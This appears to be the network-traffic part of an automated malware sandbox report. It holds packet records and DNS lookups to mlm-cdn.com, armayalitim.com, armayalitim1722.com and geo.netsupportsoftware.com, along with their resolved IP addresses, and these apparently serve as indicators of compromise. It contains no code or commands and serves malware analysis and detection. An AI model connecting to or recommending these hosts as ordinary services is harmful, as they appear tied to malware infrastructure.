Sep 21, 2024 14:45:36.481957912 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.481997013 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.482023001 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.482034922 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.482069969 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.482084990 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.482597113 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.482650995 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.482724905 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.482765913 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.482773066 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.482791901 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.482815981 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.482846975 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.483103991 CEST  49701     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.483119011 CEST  443       49701     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.552700043 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.552748919 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:36.552819967 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.553067923 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:36.553080082 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.081043959 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.081173897 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.081665993 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.081681967 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.081876040 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.081882000 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.285911083 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.285943985 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.286000013 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.286029100 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.286052942 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.286106110 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.374316931 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.374484062 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.375128984 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.375334978 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.376166105 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.376247883 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.417814970 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.418040991 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.462769032 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.462872028 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.463258982 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.463336945 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.464157104 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.464230061 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.464839935 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.464919090 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.465748072 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.465821028 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.465847969 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.465893984 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.465909958 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.465945959 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.465953112 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.465985060 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.466686010 CEST  49702     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.466705084 CEST  443       49702     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.801506996 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.801554918 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:37.801613092 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.801994085 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:37.802006960 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.331573963 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.331631899 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.333144903 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.333152056 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.333319902 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.333327055 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.537333012 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.537395954 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.537399054 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.537425995 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.537453890 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.537483931 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.537497044 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.537530899 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.625634909 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.625747919 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.625992060 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.626050949 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.626863956 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.626931906 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.627840996 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.627907991 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.714333057 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.714411020 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.714886904 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.714942932 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.715648890 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.715837955 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.716509104 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.716571093 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.717367887 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.717433929 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.717664957 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.717720032 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.718859911 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.718920946 CEST  49703     443       192.168.2.7      142.11.212.184
Sep 21, 2024 14:45:38.802797079 CEST  443       49703     142.11.212.184   192.168.2.7
Sep 21, 2024 14:45:38.802881002 CEST  49703     443       192.168.2.7      142.11.212.184
                                                      Sep 21, 2024 14:45:38.803077936 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.803138018 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.803497076 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.803555012 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.803849936 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.803905010 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804116011 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804167032 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804589033 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804629087 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804694891 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804694891 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804708958 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804752111 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.807666063 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.807749987 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.807936907 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.807985067 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.808355093 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.808408976 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.808552027 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.808610916 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.891824961 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.891952991 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.891979933 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892009974 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892045021 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892061949 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892112017 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892175913 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892250061 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892323971 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892632008 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892699003 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.893196106 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.893286943 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.893294096 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.893317938 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.893353939 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.893378973 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.894062042 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.894133091 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.894155979 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.894212008 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.894912004 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.894990921 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895023108 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895087957 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895112038 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895172119 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895781040 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895854950 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895889044 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895970106 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.896662951 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.896742105 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.896761894 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.896814108 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.980186939 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.980328083 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.980431080 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.980480909 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.980674028 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.980731010 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.981184006 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.981241941 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.981622934 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.981678963 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.981857061 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.981905937 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982398033 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982470989 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982873917 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982932091 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982932091 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982944012 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982969999 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982980013 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982994080 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983016968 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.983035088 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.983813047 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983863115 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983871937 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.983877897 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983920097 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.984685898 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984740019 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984741926 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.984750986 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984774113 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984787941 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.984795094 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984858990 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.985582113 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.985647917 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.068650961 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.068783045 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069000959 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069149971 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069299936 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069356918 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069370985 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069405079 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069407940 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069451094 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.076342106 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.076363087 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.519445896 CEST49704443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:45:39.519488096 CEST4434970437.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:45:39.519711971 CEST49704443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:45:39.583432913 CEST49704443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:45:39.583453894 CEST4434970437.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:45:39.583517075 CEST4434970437.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:45:40.590425014 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:45:40.595690966 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:45:40.595936060 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:45:40.596533060 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:45:40.601782084 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:45:41.241857052 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:45:41.241981983 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:46:34.895026922 CEST63016443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:46:34.895076036 CEST4436301637.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:46:34.895260096 CEST63016443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:46:34.955997944 CEST63016443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:46:34.956073046 CEST4436301637.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:46:34.956187010 CEST4436301637.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:08.219805956 CEST63017443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:08.219851017 CEST4436301737.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:08.219908953 CEST63017443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:08.284018040 CEST63017443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:08.284050941 CEST4436301737.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:08.284104109 CEST4436301737.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:30.568032980 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:47:30.573524952 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:47:30.575905085 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:47:42.513309956 CEST63018443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:42.513359070 CEST4436301837.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:42.513807058 CEST63018443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:42.637018919 CEST63018443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:42.637053967 CEST4436301837.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:42.637120008 CEST4436301837.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:15.488215923 CEST63019443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:15.488272905 CEST4436301937.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:15.488357067 CEST63019443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:15.550273895 CEST63019443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:15.550304890 CEST4436301937.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:15.550365925 CEST4436301937.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:48.707824945 CEST63020443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:48.707878113 CEST4436302037.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:48.711967945 CEST63020443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:48.769455910 CEST63020443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:48.769473076 CEST4436302037.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:48.769550085 CEST4436302037.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:49:21.895914078 CEST63021443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:49:21.895967007 CEST4436302137.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:49:21.900033951 CEST63021443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:49:21.959918976 CEST63021443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:49:21.959949970 CEST4436302137.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:49:21.960012913 CEST4436302137.1.209.225192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 21, 2024 14:45:29.931708097 CEST | 64806 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:45:30.191175938 CEST | 53 | 64806 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:45:39.463484049 CEST | 55856 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:45:39.507834911 CEST | 53 | 55856 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:45:39.613857031 CEST | 56398 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:45:39.623414040 CEST | 53 | 56398 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:45:40.577469110 CEST | 52598 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:45:40.587286949 CEST | 53 | 52598 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:45:51.400764942 CEST | 53 | 62107 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:46:34.957557917 CEST | 50102 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:46:34.967550993 CEST | 53 | 50102 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:47:08.285001993 CEST | 50923 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:47:08.387445927 CEST | 53 | 50923 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:47:42.640400887 CEST | 53309 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:47:42.649945974 CEST | 53 | 53309 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:48:15.550982952 CEST | 50192 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:48:15.766632080 CEST | 53 | 50192 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:48:48.770603895 CEST | 50429 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:48:48.777656078 CEST | 53 | 50429 | 1.1.1.1 | 192.168.2.7
Sep 21, 2024 14:49:21.968064070 CEST | 51518 | 53 | 192.168.2.7 | 1.1.1.1
Sep 21, 2024 14:49:22.094172001 CEST | 53 | 51518 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 21, 2024 14:45:29.931708097 CEST | 192.168.2.7 | 1.1.1.1 | 0xd24e | Standard query (0) | mlm-cdn.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:39.463484049 CEST | 192.168.2.7 | 1.1.1.1 | 0x8f8f | Standard query (0) | armayalitim.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:39.613857031 CEST | 192.168.2.7 | 1.1.1.1 | 0x107 | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:40.577469110 CEST | 192.168.2.7 | 1.1.1.1 | 0x5f83 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:46:34.957557917 CEST | 192.168.2.7 | 1.1.1.1 | 0x3bac | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:47:08.285001993 CEST | 192.168.2.7 | 1.1.1.1 | 0x756a | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:47:42.640400887 CEST | 192.168.2.7 | 1.1.1.1 | 0x3611 | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:48:15.550982952 CEST | 192.168.2.7 | 1.1.1.1 | 0xd959 | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:48:48.770603895 CEST | 192.168.2.7 | 1.1.1.1 | 0x6edc | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:49:21.968064070 CEST | 192.168.2.7 | 1.1.1.1 | 0x86b7 | Standard query (0) | armayalitim1722.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 21, 2024 14:45:30.191175938 CEST | 1.1.1.1 | 192.168.2.7 | 0xd24e | No error (0) | mlm-cdn.com | | 142.11.212.184 | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:39.507834911 CEST | 1.1.1.1 | 192.168.2.7 | 0x8f8f | No error (0) | armayalitim.com | | 37.1.209.225 | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:39.623414040 CEST | 1.1.1.1 | 192.168.2.7 | 0x107 | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:40.587286949 CEST | 1.1.1.1 | 192.168.2.7 | 0x5f83 | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:40.587286949 CEST | 1.1.1.1 | 192.168.2.7 | 0x5f83 | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:45:40.587286949 CEST | 1.1.1.1 | 192.168.2.7 | 0x5f83 | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:46:34.967550993 CEST | 1.1.1.1 | 192.168.2.7 | 0x3bac | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:47:08.387445927 CEST | 1.1.1.1 | 192.168.2.7 | 0x756a | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:47:42.649945974 CEST | 1.1.1.1 | 192.168.2.7 | 0x3611 | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:48:15.766632080 CEST | 1.1.1.1 | 192.168.2.7 | 0xd959 | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:48:48.777656078 CEST | 1.1.1.1 | 192.168.2.7 | 0x6edc | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
Sep 21, 2024 14:49:22.094172001 CEST | 1.1.1.1 | 192.168.2.7 | 0x86b7 | Name error (3) | armayalitim1722.com | none | none | A (IP address) | IN (0x0001) | false
• mlm-cdn.com
